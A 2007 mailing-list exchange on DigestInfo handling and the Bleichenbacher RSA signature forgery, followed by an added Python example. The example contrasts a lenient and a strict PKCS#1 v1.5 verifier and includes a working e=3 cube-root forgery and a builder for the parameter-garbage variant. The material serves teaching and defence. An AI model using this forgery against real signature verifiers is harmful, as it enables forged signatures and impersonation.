Re: AlgorithmIdentifier, SHA-1, etc.
Eric Rescorla wrote:
> At Sat, 07 Apr 2007 12:39:07 +0100,
> Dr Stephen Henson wrote:
>>
>> Russ Housley wrote:
>>> Note that the DigestInfoValue is part of the structure that is
>>> "encrypted" with the RSA private key when generating a signature. It is
>>> recovered by "decrypting" the signature value with the RSA public key.
>>>
>> Note that care should be taken when handling the DigestInfo structure
>> recovered from an RSA signature.
>>
>> As well as the original Bleichenbacher signature forgery attack (caused
>> by ignoring trailing garbage after DigestInfo) there is a variant which
>> inserts garbage in the middle of the recovered structure. Allowing
>> arbitrary parameter values in the DigestAlgorithmIdentifier (for example
>> large OCTET STRINGs) is one way to do this. Unlike the original attack
>> this variant produces a "valid" DigestInfo structure.
>>
>> As a result in the specific case of the recovered DigestInfo from an RSA
>> signature OpenSSL now only tolerates a NULL or absent parameter field.
>> This is OK for all existing digests.
>>
>> It is more liberal about DigestInfo structures in other contexts.
>
> Steven,
>
> As I recall OpenSSL puts the NULL in the digestAlgorithm encoding
> as well. Am I right about that?
>
>
Yes. It places the NULL in the DigestAlgorithmIdentifier of the DigestInfo
for RSA signatures, according to PKCS#1.
It also includes it in other DigestAlgorithmIdentifier structures too.
As I recall (I'd have to check some ancient email archives) the NULL was
needed to pass an old S/MIME v2 compliance test some years back.
Steve.
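The two parsing mistakes Steve describes above, shown side by side in an added example (this is not code from the thread and not OpenSSL's implementation). It builds a SHA-1 PKCS#1 v1.5 encoded message, a "lenient" verifier that parses the recovered DigestInfo and ignores trailing bytes and AlgorithmIdentifier parameters, and a "strict" verifier that requires DigestInfo to end exactly at the end of EM and the parameters to be absent or NULL. It then carries out the original Bleichenbacher e=3 forgery against the lenient verifier, which needs no private key at all, and shows the parameter variant (a large OCTET STRING parameter) at the parser level. Assumptions: N is a constructed stand-in 3072-bit modulus (the forgery never reduces modulo N, so its factorisation does not matter), and the helper names (der, tlv, verify_lenient, verify_strict, forge_e3, em_with_param_garbage) are hypothetical.

```python
import hashlib
import hmac

SHA1_OID = bytes.fromhex("2b0e03021a")   # id-sha1, OID 1.3.14.3.2.26
NULL = b"\x05\x00"                        # DER NULL, the parameter encoding PKCS#1 expects
# Constructed stand-in for a 3072-bit, e = 3 modulus. The forgery below produces a
# cube that is smaller than N, so no modular reduction happens and no key is needed.
N = (1 << 3071) | 1


def der(tag, body):
    """Encode one DER TLV (lengths below 65536 are all this example needs)."""
    n = len(body)
    if n < 0x80:
        ln = bytes([n])
    elif n < 0x100:
        ln = bytes([0x81, n])
    else:
        ln = bytes([0x82, n >> 8, n & 0xff])
    return bytes([tag]) + ln + body


def tlv(buf, pos):
    """Decode one DER TLV at pos; returns (tag, value, offset just after it)."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        nb = ln & 0x7f
        ln, pos = int.from_bytes(buf[pos:pos + nb], "big"), pos + nb
    return tag, buf[pos:pos + ln], pos + ln


def digest_info(digest, params=NULL):
    """DigestInfo ::= SEQUENCE { SEQUENCE { OID, params }, OCTET STRING digest }"""
    return der(0x30, der(0x30, der(0x06, SHA1_OID) + params) + der(0x04, digest))


def emsa_pkcs1_v15(msg, em_len, params=NULL):
    """EM = 00 || 01 || FF..FF || 00 || DigestInfo (RFC 3447, EMSA-PKCS1-v1_5)."""
    t = digest_info(hashlib.sha1(msg).digest(), params)
    return b"\x00\x01" + b"\xff" * (em_len - len(t) - 3) + b"\x00" + t


def _digest_info_offset(em):
    """Offset of DigestInfo in EM, or None if the 00 01 FF.. 00 header is malformed."""
    if em[:2] != b"\x00\x01":
        return None
    i = 2
    while i < len(em) and em[i] == 0xff:
        i += 1
    if i - 2 < 8 or i >= len(em) or em[i] != 0x00:
        return None
    return i + 1


def verify_lenient(em, msg):
    """The flawed pattern: find DigestInfo, check OID and digest, look at nothing else."""
    start = _digest_info_offset(em)
    if start is None:
        return False
    tag, di, _ = tlv(em, start)            # bytes after DigestInfo are never examined
    if tag != 0x30:
        return False
    _, algid, p = tlv(di, 0)
    _, oid, _ = tlv(algid, 0)              # parameters after the OID are never examined
    _, dg, _ = tlv(di, p)
    return oid == SHA1_OID and dg == hashlib.sha1(msg).digest()


def verify_strict(em, msg):
    """DigestInfo must fill EM exactly; parameters must be absent or NULL."""
    start = _digest_info_offset(em)
    if start is None:
        return False
    tag, di, end = tlv(em, start)
    if tag != 0x30 or end != len(em):      # rejects trailing garbage
        return False
    tag, algid, p = tlv(di, 0)
    tag2, oid, q = tlv(algid, 0)
    if tag != 0x30 or tag2 != 0x06 or oid != SHA1_OID:
        return False
    if algid[q:] not in (b"", NULL):       # rejects garbage in the middle (parameters)
        return False
    tag3, dg, end2 = tlv(di, p)
    if tag3 != 0x04 or end2 != len(di):
        return False
    return hmac.compare_digest(dg, hashlib.sha1(msg).digest())


def icbrt(n):
    """Floor of the integer cube root, Newton's method started above the root."""
    x = 1 << ((n.bit_length() + 2) // 3)
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y


def forge_e3(msg, n):
    """Original Bleichenbacher forgery for e = 3: take the cube root of
    00 01 FF*8 00 DigestInfo 00..00. The rounding error of the root lands in
    the low (garbage) bits, so s**3 reproduces the prefix exactly, and s**3 < n."""
    em_len = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(hashlib.sha1(msg).digest())
    target = int.from_bytes(prefix, "big") << (8 * (em_len - len(prefix)))
    s = icbrt(target) + 1                  # s is the forged signature value
    return pow(s, 3, n).to_bytes(em_len, "big")   # the EM a verifier recovers from s


def em_with_param_garbage(msg, em_len, filler=b"\x00" * 200):
    """The variant from the thread: a structurally valid DigestInfo whose
    AlgorithmIdentifier carries a large OCTET STRING parameter. Shown at the
    parser level only; no cube-root step for mid-EM garbage is attempted here."""
    return emsa_pkcs1_v15(msg, em_len, params=der(0x04, filler))
```

forge_e3 returns the recovered EM rather than the signature integer so the two verifiers can be fed directly; verify_lenient accepts it and verify_strict rejects it, while a genuine emsa_pkcs1_v15 encoding (with NULL or absent parameters) passes both. The lenient parser is deliberately unguarded against truncated input, as the flawed implementations were.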